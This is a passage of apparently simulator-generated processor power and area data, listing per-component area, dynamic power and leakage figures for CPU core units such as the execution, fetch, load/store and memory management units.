'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.128898,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.130051,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0434713,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.781334,
'Memory Management Unit/Runtime Dynamic': 0.173522,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 28.2145,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.776122,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0306721,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.202831,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.00962,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 8.68275,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0837231,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.268448,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.530377,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.161771,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.260931,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.131709,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.554411,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.103704,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.9154,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.1002,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00678541,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.07723,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0501822,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.17743,
'Execution Unit/Register Files/Runtime Dynamic': 0.0569676,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.183637,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.479928,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.76513,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 2.11377e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 2.11377e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.84999e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 7.21025e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000720872,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000781647,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000199489,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0482415,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.06857,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.118768,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.16385,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.43601,
'Instruction Fetch Unit/Runtime Dynamic': 0.331841,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0344444,
'L2/Runtime Dynamic': 0.00942878,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.27157,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.988552,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0658194,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0658193,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.58238,
'Load Store Unit/Runtime Dynamic': 1.37897,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.162299,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.324598,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0576006,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0581022,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.190793,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0195164,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.445849,
'Memory Management Unit/Runtime Dynamic': 0.0776186,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 18.0036,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.263579,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0105064,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0774821,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.351567,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.91456,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0817799,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.266922,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.51822,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.157556,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.254131,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.128277,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.539964,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.100749,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.88915,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0979028,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00660859,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.075292,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0488746,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.173195,
'Execution Unit/Register Files/Runtime Dynamic': 0.0554832,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.179069,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.467607,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.73535,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 1.72961e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 1.72961e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.50842e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 5.8499e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000702087,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000751764,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000165144,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0469844,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.98861,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.115621,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.15958,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.35217,
'Instruction Fetch Unit/Runtime Dynamic': 0.323102,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0331364,
'L2/Runtime Dynamic': 0.00896434,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.21612,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.961208,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0640254,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0640254,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.51846,
'Load Store Unit/Runtime Dynamic': 1.34098,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.157876,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.315752,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
